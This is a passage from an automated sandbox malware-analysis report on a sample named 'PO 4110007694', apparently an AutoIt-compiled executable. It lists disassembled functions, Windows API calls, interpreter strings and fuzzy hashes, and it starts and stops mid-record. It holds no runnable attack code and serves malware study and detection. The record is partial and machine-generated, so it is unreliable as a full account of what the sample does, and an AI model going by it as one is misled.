                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 1f07ec0b8070b58addcdf0f1ae933ed900708375d03a185f7bb13063269968c0
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 83C163722251930EDF2E463A847413EFAA15EA37B171E176DD8B2CB1D4EE20CA659620
                                                                    Function 017E22E0 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: 4f6139ad6a12a8dbe5af85b45b1ed307f852a813a26112bf8d443f46c837f330
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: 7E41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                                    Function 017E2170 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: 194f9f2e508d932d74a2604f90dfc870434d681c1b7b820213af506dda6d590c
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: D8019278A00109EFCB49DF98C5949AEF7FAFB48310F208599D909A7742D730EE41DB80
                                                                    Function 017E21D0 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: 3c1bc509b85214a0203636fe2f51f35a645696287c6a797faf3f857e1a5f1086
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: 7C018078A04109EFCB45DF98C5949AEF7FAFB4C210F208699D919A7742D730AE51DB80
                                                                    Function 017E0B60 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    Function 00C87806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00C8785B
                                                                    • DeleteObject.GDI32(00000000), ref: 00C8786D
                                                                    • DestroyWindow.USER32 ref: 00C8787B
                                                                    • GetDesktopWindow.USER32 ref: 00C87895
                                                                    • GetWindowRect.USER32(00000000), ref: 00C8789C
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C879DD
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C879ED
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A35
                                                                    • GetClientRect.USER32(00000000,?), ref: 00C87A41
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C87A7B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A9D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AB0
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87ABB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00C87AC4
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AD3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00C87ADC
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AE3
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C87AEE
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B00
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CA2CAC,00000000), ref: 00C87B16
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C87B26
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C87B4C
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C87B6B
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B8D
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87D7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                    • Instruction ID: 29eed8d8ae1f0429484585596256f9ed5eb78c43b1ae1c58dd7e943b7aa517fb
                                                                    • Opcode Fuzzy Hash: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                    • Instruction Fuzzy Hash: C3026A71900115AFDB14EFA4CC89FAE7BB9EB49314F148259F915EB2A0D730EE42DB60
                                                                    Function 00C9356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,00C9F910), ref: 00C93627
                                                                    • IsWindowVisible.USER32(?), ref: 00C9364B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 4105515805-45149045
                                                                    • Opcode ID: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                    • Instruction ID: fec9d16f670e06af51590235920bcd75cdf2308544e6cc9e395731e901eb2764
                                                                    • Opcode Fuzzy Hash: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                    • Instruction Fuzzy Hash: D5D18C712183419BCF14EF10C869AAE77A5EF95344F144468F8929B3E2CB31EE4AEB45
                                                                    Function 00C9A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00C9A630
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C9A661
                                                                    • GetSysColor.USER32(0000000F), ref: 00C9A66D
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00C9A687
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C9A696
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A6C1
                                                                    • GetSysColor.USER32(00000010), ref: 00C9A6C9
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00C9A6D0
                                                                    • FrameRect.USER32(?,?,00000000), ref: 00C9A6DF
                                                                    • DeleteObject.GDI32(00000000), ref: 00C9A6E6
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00C9A731
                                                                    • FillRect.USER32(?,?,00000000), ref: 00C9A763
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9A78E
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000012), ref: 00C9A903
                                                                      • Part of subcall function 00C9A8CA: SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                      • Part of subcall function 00C9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000011), ref: 00C9A945
                                                                      • Part of subcall function 00C9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                      • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                      • Part of subcall function 00C9A8CA: SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                      • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                      • Part of subcall function 00C9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                      • Part of subcall function 00C9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                      • Part of subcall function 00C9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                      • Part of subcall function 00C9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 031bff4fcf7b16e3ca5d97379c0061936e4d70004f270227b8f0e1a1a0004e7e
                                                                    • Instruction ID: e7a6a56fbd6e9b9ab603534cce6a37f8cf6683c7f80edbaec43fc8a16a5d80b2
                                                                    • Opcode Fuzzy Hash: 031bff4fcf7b16e3ca5d97379c0061936e4d70004f270227b8f0e1a1a0004e7e
                                                                    • Instruction Fuzzy Hash: 12914B72408305EFCB109F64DC0CB6E7BA9FB88321F104A2EF9A2D61A0D771D945CB92
                                                                    Function 00C12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?), ref: 00C12CA2
                                                                    • DeleteObject.GDI32(00000000), ref: 00C12CE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00C12CF3
                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00C12CFE
                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00C12D09
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C4C43B
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C4C474
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C4C89D
                                                                      • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                    • SendMessageW.USER32(?,00001053), ref: 00C4C8DA
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C4C8F1
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C907
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C912
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                    • Instruction ID: ba56c072d9f1c5abae851a6a5c22c52b16ef7a5ec6104ebceb9d4a2187650f6d
                                                                    • Opcode Fuzzy Hash: e055b37629bc293a34b93174c8f56782995c84384c3b1ee47f2f9060bd9999ba
                                                                    • Instruction Fuzzy Hash: 9E129D34601201EFDB50CF24C8D8BA9BBE5BF05310F548569F9A5CB262CB31ED92EB91
                                                                    Function 00C874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 00C874DE
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C8759D
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C875DB
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C875ED
                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C87633
                                                                    • GetClientRect.USER32(00000000,?), ref: 00C8763F
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C87683
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C87692
                                                                    • GetStockObject.GDI32(00000011), ref: 00C876A2
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C876A6
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C876B6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C876BF
                                                                    • DeleteDC.GDI32(00000000), ref: 00C876C8
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C876F4
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C8770B
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C87746
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C8775A
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C8776B
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C8779B
                                                                    • GetStockObject.GDI32(00000011), ref: 00C877A6
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C877B1
                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C877BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                    • Instruction ID: d2e4a66305a7bfb243408a74cb854ce4d3647cf1da8c44eb06561babc9905596
                                                                    • Opcode Fuzzy Hash: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                    • Instruction Fuzzy Hash: F3A181B1A40605BFEB14DBA4DC4AFAE7BB9EB05714F108219FA14E72E0D770AD01DB64
                                                                    Function 00C7AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7AD1E
                                                                    • GetDriveTypeW.KERNEL32(?,00C9FAC0,?,\\.\,00C9F910), ref: 00C7ADFB
                                                                    • SetErrorMode.KERNEL32(00000000,00C9FAC0,?,\\.\,00C9F910), ref: 00C7AF59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 470c7c9a5887d9aca352bccb1087d9fcbef975146bd6139b97ef2b0e61955841
                                                                    • Instruction ID: eee0c6c0c6062f468c346a0c9a5d8e3c704827bbb85902e51f6a2bb66c45e756
                                                                    • Opcode Fuzzy Hash: 470c7c9a5887d9aca352bccb1087d9fcbef975146bd6139b97ef2b0e61955841
                                                                    • Instruction Fuzzy Hash: 355184B1649205EB8B10DB91C952EBE7361EB89700B20C06BF41BA72D1DB319E46FB53
                                                                    Function 00C168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: af6930fd701dcf8476d053da859591df7336a82e7a7418ba092ff5cb33018570
                                                                    • Instruction ID: 3f1a1d970af15ee194d5bcc649d7ba462d98bef3b05f1fe09190c3d2b0a1d862
                                                                    • Opcode Fuzzy Hash: af6930fd701dcf8476d053da859591df7336a82e7a7418ba092ff5cb33018570
                                                                    • Instruction Fuzzy Hash: 348104B1640215ABCF21BF65EC46FFF7768BF07700F044024F945AA192EB61DA86F2A1
                                                                    Function 00C9A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 00C9A903
                                                                    • SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                    • GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                    • CreateSolidBrush.GDI32(?), ref: 00C9A92D
                                                                    • GetSysColor.USER32(00000011), ref: 00C9A945
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                    • SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C9AA14
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00C9AA32
                                                                    • DrawFocusRect.USER32(?,?), ref: 00C9AA3D
                                                                    • GetSysColor.USER32(00000011), ref: 00C9AA4B
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00C9AA53
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C9AA67
                                                                    • SelectObject.GDI32(?,00C9A5FA), ref: 00C9AA7E
                                                                    • DeleteObject.GDI32(?), ref: 00C9AA89
                                                                    • SelectObject.GDI32(?,?), ref: 00C9AA8F
                                                                    • DeleteObject.GDI32(?), ref: 00C9AA94
                                                                    • SetTextColor.GDI32(?,?), ref: 00C9AA9A
                                                                    • SetBkColor.GDI32(?,?), ref: 00C9AAA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: b517e3f2ffb43438789f8a2f959645e1579e43bccc75f16f87622a21064ee489
                                                                    • Instruction ID: 9512f3d028b2c64f3f056bcf0109f8f68330d23922bba52c1ccdd871f091edcd
                                                                    • Opcode Fuzzy Hash: b517e3f2ffb43438789f8a2f959645e1579e43bccc75f16f87622a21064ee489
